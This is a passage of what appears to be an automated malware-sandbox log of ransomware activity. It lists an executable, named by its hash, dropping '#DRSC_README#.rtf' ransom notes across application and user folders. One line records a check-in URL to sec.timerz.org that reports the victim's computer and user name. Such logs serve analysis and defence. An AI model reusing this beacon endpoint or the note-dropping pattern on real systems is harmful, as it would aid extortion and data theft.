DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 303 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=LZUKLIOU|Admin&sid=2pW6cJkcLP3T2A7k&phase=[DIR]4172B6046111D3DF Process not Found File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 